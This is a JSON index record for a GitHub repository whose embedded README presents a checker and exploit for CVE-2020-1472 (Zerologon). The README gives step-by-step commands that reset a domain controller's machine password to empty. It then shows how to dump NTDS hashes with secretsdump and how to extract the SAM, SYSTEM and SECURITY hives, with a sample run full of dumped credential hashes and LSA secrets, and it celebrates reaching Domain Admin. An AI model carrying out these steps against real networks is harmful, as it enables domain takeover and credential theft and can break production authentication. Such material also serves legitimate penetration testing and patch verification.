{"id":13842893,"url":"https://github.com/VoidSec/CVE-2020-1472","last_synced_at":"2025-07-11T17:32:13.126Z","repository":{"id":74148247,"uuid":"295482050","full_name":"VoidSec/CVE-2020-1472","owner":"VoidSec","description":"Exploit Code for CVE-2020-1472 aka Zerologon","archived":false,"fork":false,"pushed_at":"2020-11-05T16:37:20.000Z","size":3878,"stargazers_count":383,"open_issues_count":0,"forks_count":65,"subscribers_count":8,"default_branch":"master","last_synced_at":"2025-05-26T10:19:22.827Z","etag":null,"topics":["cve-2020","exploit","n-day","poc","voidsec","zerologon"],"latest_commit_sha":null,"homepage":"https://voidsec.com","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/VoidSec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2020-09-14T16:57:49.000Z","updated_at":"2025-05-15T23:07:53.000Z","dependencies_parsed_at":"2024-02-03T03:55:04.751Z","dependency_job_id":"43707df0-1e16-4726-804a-2e643bf31246","html_url":"https://github.com/VoidSec/CVE-2020-1472","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/VoidSec/CVE-2020-1472","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VoidSec%2FCVE-2020-1472","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VoidSec%2FCVE-2020-1472/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VoidSec%2FCVE-2020-1472/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VoidSec%2FCVE-2020-1472/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/VoidSec","download_url":"https://codeload.github.com/VoidSec/CVE-2020-1472/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VoidSec%2FCVE-2020-1472/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264862482,"owners_count":23674981,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2020","exploit","n-day","poc","voidsec","zerologon"],"created_at":"2024-08-04T17:01:49.802Z","updated_at":"2025-07-11T17:32:12.484Z","avatar_url":"https://github.com/VoidSec.png","language":"Python","funding_links":[],"categories":["Python","Python (1887)"],"sub_categories":[],"readme":"# CVE-2020-1472\nChecker \u0026 Exploit Code for CVE-2020-1472 aka **Zerologon**\n\nTests whether a domain controller is vulnerable to the Zerologon attack, if vulnerable, it will resets the Domain Controller's account password to an empty string.\n\n**NOTE:** It will likely break things in production environments (eg. DNS functionality, communication  with replication Domain Controllers, etc); target clients will then not be able to authenticate to the domain anymore, and they can only be re-synchronized through manual action. If you want to know more on how Zerologon attack break things, thanks to the awesome works of [@_dirkjan](https://twitter.com/_dirkjan), you can read it [**HERE**](https://threadreaderapp.com/thread/1306280553281449985.html)\n\nZerologon original research and whitepaper by Secura (Tom Tervoort) - [https://www.secura.com/blog/zero-logon](https://www.secura.com/blog/zero-logon)\n\n[![asciicast](https://asciinema.org/a/359833.svg)](https://asciinema.org/a/359833)\n\n# Exploit\n\nIt will attempt to perform the Netlogon authentication bypass. When a domain controller is patched, the detection script will give up after sending 2000 pairs of RPC calls, concluding that the target is not vulnerable (with a false negative chance of 0.04%).\n\nThe exploit will be successful only if the Domain Controller uses the password stored in Active Directory to validate the login attempt, rather than the one stored locally as, when changing a password in this way, it is only changed in the AD. The targeted system itself will still locally store its original password.\n\n## Installation\n\nRequires Python 3.7 or higher, virtualenv, pip and ~~a modified version of Impacket's library: nrpc.py (/impacket/dcerpc/v5)~~ the latest version of impacket from [GitHub](https://github.com/SecureAuthCorp/impacket) with added netlogon structures.\n\n### 1. Install Impacket as follows:\n\n1.\t```git clone https://github.com/SecureAuthCorp/impacket```\n2.\t```cd impacket```\n3.\t```\n\tpwd \n\t~/impacket/\n\t```\n4.\t```virtualenv --python=python3 impacket```\n5.\t```source impacket/bin/activate```\n6.\t```pip install --upgrade pip```\n7.\t```pip install .```\n\n### 2. Install the Zerologon exploit script as follows:\n1.\t```pwd \n\t~/impacket/\n\t```\n2.\t```cd examples```\n3.\t```git clone https://github.com/VoidSec/CVE-2020-1472```\n4.\t```cd CVE-2020-1472```\n5.\t```pip install -r requirements.txt```\n\n## Running the script\n\nThe script can be used to target a DC or backup DC. It will likely also work against a read-only DC, but this has not been tested yet. \nThe DC name should be its NetBIOS computer name. If this name is not correct, the script will likely fail with a `STATUS_INVALID_COMPUTER_NAME` error.\nGiven a domain controller named `EXAMPLE-DC` and IP address `1.2.3.4`, run the script as follows:\n\n+    ```./cve-2020-1472-exploit.py -n EXAMPLE-DC -t 1.2.3.4```\n\nRunning the script should results in Domain Controller's account password being reset to an empty string.\n\nAt this point you should be able to run Impacket's ```secretsdump.py -no-pass -just-dc Domain/'DC_NETBIOS_NAME$'@DC_IP_ADDR``` (alternatively you can use the empty hash: ```-hashes :31d6cfe0d16ae931b73c59d7e0c089c0```) that will extract only NTDS.DIT data (NTLM hashes and Kerberos keys).\n\nWhich should get you Domain Admin. **WIN WIN WIN**\n\n### Example Run\n```\n\u003e cve-2020-1472-exploit.py -n WIN-U4Q9LLP6L2A -t 192.168.209.129\n[+] Success: Zerologon Exploit completed! DC's account password has been set to an empty string.\n\n\u003e secretsdump.py -no-pass -just-dc ad.test.com/WIN-U4Q9LLP6L2A\\$@192.168.209.129\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::\n\nRestore:\n\u003e wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe ad.test.com/Administrator@192.168.209.129\n- reg save HKLM\\SYSTEM system.save\n- reg save HKLM\\SAM sam.save\n- reg save HKLM\\SECURITY security.save\n- get system.save\n- get sam.save\n- get security.save\n- del /f system.save\n- del /f sam.save\n- del /f security.save\n\n\u003e secretsdump.py -sam sam.save -system system.save -security security.save LOCAL\n[*] Target system bootKey: 0x31f99ee2e750274d1fee930ab88fe126\n[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nDefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.\n[*] Dumping cached domain logon information (domain/username:hash)\n[*] Dumping LSA Secrets\n[*] $MACHINE.ACC \n$MACHINE.ACC:plain_password_hex:ef464f4194d9f401af41c9982dc7c85524cc9ed8adef4fe24c8044d13f1ae41c594131d2d46cab3a0d3384cda94baae65d5a87d26df1201ff6ff1697672ac4e16c16f0e514f6e54d84342c5af4193fe96329e3a30fb84c08845e7a86dac4295276c7c2e3181555fa5eef21d4d1f469550f4706383327b299283f72b7df6b661cfb11189bd8b3ab552ffb99aa12ffe19b760e00e143ef3e776d8377da57925c5ed71aa9f0991acff7fc9c963addb8496fdd273f231e15a51d99f41a770de714573b26795c45a03eac80e3bb45ac5c100740da5814c3979e5349e8471623086c80f6160163f4bd56da3b75a6deb17b1020\n$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:9b5ccb9700e3ed723df08132357ff6a1\n[*] DPAPI_SYSTEM \ndpapi_machinekey:0xaf83406b2611f18ac99329079e9f47d9409e885f\ndpapi_userkey:0x53ed555f11c110f918fc9a97a6c3576266930fb7\n[*] NL$KM \n 0000   55 A7 DF DF 27 E2 64 C1  F7 42 F2 1B 96 76 01 4F   U...'.d..B...v.O\n 0010   24 4C 5D 9B 20 E3 EA 95  DD E9 61 0F 00 8E B2 51   $L]. .....a....Q\n 0020   B1 79 3F E0 37 3E CB B2  95 31 A6 74 F3 35 54 8A   .y?.7\u003e...1.t.5T.\n 0030   C1 B6 70 3D B3 AB AC C1  7E 8E 90 7A 7B 49 32 46   ..p=....~..z{I2F\nNL$KM:55a7dfdf27e264c1f742f21b9676014f244c5d9b20e3ea95dde9610f008eb251b1793fe0373ecbb29531a674f335548ac1b6703db3abacc17e8e907a7b493246\n[*] Cleaning up... \n\n\u003e reinstall_original_pw.py WIN-U4Q9LLP6L2A 192.168.209.129 ef464f4194d9f401af41c9982dc7c85524cc9ed8adef4fe24c8044d13f1ae41c594131d2d46cab3a0d3384cda94baae65d5a87d26df1201ff6ff1697672ac4e16c16f0e514f6e54d84342c5af4193fe96329e3a30fb84c08845e7a86dac4295276c7c2e3181555fa5eef21d4d1f469550f4706383327b299283f72b7df6b661cfb11189bd8b3ab552ffb99aa12ffe19b760e00e143ef3e776d8377da57925c5ed71aa9f0991acff7fc9c963addb8496fdd273f231e15a51d99f41a770de714573b26795c45a03eac80e3bb45ac5c100740da5814c3979e5349e8471623086c80f6160163f4bd56da3b75a6deb17b1020\n```\n\n## Password Restore\n**Reinstalling the original password hash is necessary for the DC to continue to operate normally.**\n\nAfter you have obtained Domain Admin, you can ```wmiexec.py``` to the target DC with a credential obtained from secretsdump and perform the following steps:\n\n```\nreg save HKLM\\SYSTEM system.save\nreg save HKLM\\SAM sam.save\nreg save HKLM\\SECURITY security.save\nget system.save\nget sam.save\nget security.save\ndel /f system.save\ndel /f sam.save\ndel /f security.save\n```\n\nRun: ```secretsdump.py -sam sam.save -system system.save -security security.save LOCAL```\n\nAnd that should show you the original NT hash of the machine account. You can then re-install that original machine account hash to the domain by using the ```reinstall_original_pw.py``` script provided [here](https://github.com/risksense/zerologon/). Sometimes more than one run is needed before it succeed.\n```\nreinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH\n```\nAlternatively you can use following [restoration process](https://github.com/dirkjanm/CVE-2020-1472)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FVoidSec%2FCVE-2020-1472","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FVoidSec%2FCVE-2020-1472","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FVoidSec%2FCVE-2020-1472/lists"}